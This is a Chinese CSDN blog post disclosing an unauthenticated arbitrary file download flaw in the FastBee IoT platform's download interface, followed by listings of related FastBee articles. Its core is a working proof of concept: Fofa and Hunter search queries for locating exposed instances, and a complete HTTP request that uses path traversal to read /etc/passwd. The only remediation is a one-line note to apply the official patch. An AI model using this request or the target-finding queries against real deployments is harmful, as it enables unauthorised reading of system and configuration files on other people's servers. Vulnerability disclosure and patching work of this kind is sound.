蜂信物联(FastBee)物联网平台 download 任意文件下载

最新推荐文章于 2024-12-09 10:25:46 发布
最新推荐文章于 2024-12-09 10:25:46 发布
阅读量491 收藏
点赞数 7
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37834054/article/details/141887572
版权

蜂信物联(FastBee)物联网平台 download 任意文件下载

0x01 漏洞描述:

FastBee是一款开源物联网平台,致力于为全球开发者提供稳定、高效的物联网解决方案。FastBee在download接口中存在任意文件下载漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。

0x02 搜索语句:

Fofa:“fastbee”
鹰图:body=“fastbee”&&ip.country=“CN”

在这里插入图片描述

0x03 漏洞复现:

GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

在这里插入图片描述

0x04 修复建议:

官方已发布补丁 请即时修复

信物 FastBee 开源物联网平台 download 任意文件读取漏洞复现
0xSec
09-03 578
信物 FastBee 开源物联网平台 download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
FastBee开源物联网平台,更适合中小企业和个人学习使用 适用于智能家居、智慧办公、智慧社区、农业监测、水利监测、工业控制等
05-04
FastBee开源物联网平台,简单易用,更适合中小企业和个人学习使用。适用于智能家居、智慧办公、智慧社区、农业监测、水利监测、工业控制等。系统后端采用Spring boot;前端采用Vue;消息服务器采用EMQX;移动端支持微信小程序、安卓、苹果和H5采用Uniapp;数据库采用Mysql、TDengine和Redis;设备端支持ESP32、ESP8266、树莓派、合宙等
FastBee 开源物联网平台
weixin_40381772的博客
08-22 5717
其他功能:网关、TCP/Modbus/协议和netty-mqtt支持、视频监控、多租户、场景动、数据可视化平台、统计、新闻资讯、通知公告、支持TDengine时序数据库;赞助过的用户请下载商业版本源码。设备管理:设备控制、设备分组、设备定时、设备日志、监测统计、设备定位、设备分享、设备禁用、OTA升级、实时状态、影子模式、实时监测、加密认证等;sdk ----------------------- 硬件SDK,已集成多种设备。vue ----------------------- 前端。
仅3万元,国产开源基于 EMQ X + SpringBoot + Vue全栈 IoT 企业物联网平台
最新发布
m0_74825746的博客
12-09 859
*硬件 SDK:**支持WIFI和MQTT连接、物模型响应、实时监测、定时上报数据、AES加密、NTP时间、AP配网等。**设备管理:**提供设备详情、分组、日志记录、实时状态监控等管理功能,确保设备运行的高效与安全。**EMQ X管理:**Mqtt客户端、监听器、消息主题、消息订阅、插件管理、规则引擎、资源。**系统监控:**操作日志、登录日志、系统日志、在线用户、服务监控、连接池监控、缓存监控等。**权限管理:**用户管理、部门管理、岗位管理、菜单管理、角色管理、字典和参数管理等。
FastBee开源物联网平台,简单易用,可用于搭建物联网平台以及二次开发和学习。适用于智能家居、智慧_FastBee.zip
09-01
FastBee开源物联网平台,简单易用,可用于搭建物联网平台以及二次开发和学习。适用于智能家居、智慧_FastBee
探索FastBee:一款高效轻量级的Web爬虫框架
gitblog_00045的博客
04-09 505
探索FastBee:一款高效轻量级的Web爬虫框架 去发现同类优质开源项目:https://gitcode.com/ 是一个由Python构建的快速、灵活且易用的Web爬虫框架,旨在帮助开发者轻松地进行数据抓取任务。这个项目的诞生源于对高效爬虫工具的需求,它融合了现代Web开发的最佳实践,提供了强大的功能和优秀的性能。 项目简介 FastBee的核心特性在于它的模块化设计和简洁的API。开发者可以...
FastBee 基于 EMQ X + SpringBoot + Vue 开源全栈 IoT 物联网系统
04-06 4328
FastBee 简介FastBee是一个简单易用的适合中小企业和个人使用的物联网平台,设备端支持ESP32、ESP8266、树莓派等硬件;消息服务器采用EMQ X;数据库采用Mysql、TDengine和Redis;后端服务系统采用Spring boot;数据库采用Mysql、TDengine和Redis;前端Web应用系统采用Vue;移动端支持微信小程序、安卓、苹果和H5采用Uniapp技术。F...
FastBee开源物联网平台简单易用更适合中小企业和个人学习使用适用于智能家居智慧办公智慧社区农业监测水利监测等
04-02
信物是原物美智能更名后的开源物联网平台。它的设计简单易用,更适合中小企业和个人学习使用。该平台适用于智能家居、智慧办公、智慧社区、农业监测、水利监测、工业控制等领域。 信物的系统后端采用了...
信物:全面开放的IoT平台,助力多场景应用
资源摘要信息:"FastBee开源物联网平台" FastBee是一个开源的物联网平台,它以其简单易用的特性特别适合中小企业和个人学习者使用。平台的应用场景广泛,涵盖智能家居、智慧办公、智慧社区、农业监测、水利监测以及...
【开源物联网平台Fastbee开源物联网项目RoadMap
开源物联网项目商业化作者
01-25 1479
架构优化 代码简化 业务&协议解耦 关键组件支持横向拓展 网络协议支持横向拓展,包括:mqtt broker,tcp,coap,udp,sip等 协议插件化 编码脚本化 业务代码模版化 消息总线 功能优化 网关/子网关:上线,绑定,拓扑,消息代理/透传/轮询等功能完善 设备详情简化,运行状态,监测,历史记录等界面优化,组件可编辑 设备OT能力完善,配合SDK完善设备产测,设备出厂配置,设备一键注网,设备批量上线,设备升级,设备维护&替换等流程 设备IT能力完善,更方便对接动第三方系统
FastBee开源物联网平台,简单易用更适合中小企业和个人学习使用适用于智能家居智慧办公智慧社区农业监测水利监测工业控制等
10-08
FastBee开源物联网平台,简单易用,更适合中小企业和个人学习使用。适用于智能家居、智慧办公、智慧社区、农业监测、水利监测、工业控制等。系统后端采用Spring boot;前端采用Vue;消息服务器采用EMQX;移动端支持微信小程序、安卓、苹果和H5采用Uniapp;数据库采用Mysql、TDengine和Redis;设备端支持ESP32、ESP8266、树莓派、合宙等;
【开源物联网平台FastBee物联网平台2.0开源版发布
开源物联网项目商业化作者
04-14 3150
物美智能(wumei-smart)更名为信物(FastBee)FastBee开源物联网平台,简单易用,更适合中小企业和个人学习使用。适用于智能家居、智慧办公、智慧社区、农业监测、水利监测、工业控制等。系统后端采用Spring boot;前端采用Vue;消息服务器采用EMQX;移动端支持微信小程序、安卓、苹果和H5采用Uniapp;数据库采用Mysql、TDengine和Redis;设备端支持ESP32、ESP8266、树莓派、合宙等;
【开源物联网平台Fastbee物联网平台新手快速入门
开源物联网项目商业化作者
04-14 3682
启动fastbee之前,请先确定已经安装好以下基础服务:开发者根据自身环境情况选择参考IDEA本地调试或Docker远程部署。前端环境准备如下。
FastBee物联网开源项目本地启动调试
Lyh_2015的博客
07-17 714
(2)IntelliJ IDEA Community Edition (启动后端项目)(1)Visual Studio Code(启动前端项目)(3)Docker Desktop(安装组件)(1)docker 安装Redis7.0。(2)docker 安装Mysql5.7。(4)Node.js(前端启动使用)1、docker安装组件。
【未公开0day】FastBee开源物联网平台 download 任意文件下载漏洞【附poc下载
苏诺木安全团队
10-16 466
【未公开0day】FastBee开源物联网平台 download 任意文件下载漏洞【附poc下载
FastBee开源物联网平台download接口存在任意文件读取漏洞
nnn2188185的博客
09-03 153
FastBee开源物联网平台download接口存在任意文件读取漏洞
【开源物联网平台】使用MQTT.fx模拟设备接入FastBee物联网平台
开源物联网项目商业化作者
03-07 1794
获取当前时间,可以调用系统的NTP时间接口,接口请求时发送设备当前运行毫秒数,返回设备发送时间、服务端接收时间、服务端发送时间。产品详情中获取产品编号、Mqtt账号、Mqtt密码和产品秘钥,密码通过产品秘钥进行AES加密,传递到后端;通过web端获取产品ID和设备编号,如果使用自动添加设备,设备编号可以使用唯一编码或者使用设备MAC地址,设备认证成功后会在后端自动添加一个对应的设备实体。16位,输出为Base64,加密使用的密码为产品密钥。发布数据 (实时显示,属性/功能和监测数据,可定时上报监测数据)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值